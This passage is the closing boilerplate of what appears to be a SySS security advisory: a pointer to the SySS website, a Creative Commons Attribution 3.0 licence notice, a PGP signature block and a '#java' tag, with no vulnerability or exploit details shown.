version of this security advisory is available on the SySS website. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: http://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQEzBAEBCgAdFiEELI/xAZ13veZGXszCdo7+K7PlPdoFAmNkyT8ACgkQdo7+K7Pl Pdr9wggAgJhwDe73i39znBu9RdOCnCPXQJLXmw5f6maSPhothYCJ6en+tRUZGDdD SfedURYFLcy7BPp1KO1eMUdVuvriK3m5Cqp1eYugyhNsruzHiG1LfQ3uA8jNyg+G 30PWxY/q5WoOt3tsHTKNLJZbQTPSALdRaECOwsiBc5vAYGG7AasO2YRFjYsSzkQc 4hgpYlHuuqGXuKodwo/jvr//mNzRpsgfZS3gc1YbSLTTbfxWyO+x3VkOCOJ3jIQY 3BX6EzNyqzf86QV3jmA2AIWEUVQx6NWlDNlbiR9atusDirt3O+hXfcSTpRYwNGLk +fP7SQHkgdJXx+u1Blv4Uhs3F7gfeA== =Zy4q -----END PGP SIGNATURE-----

Tag

#java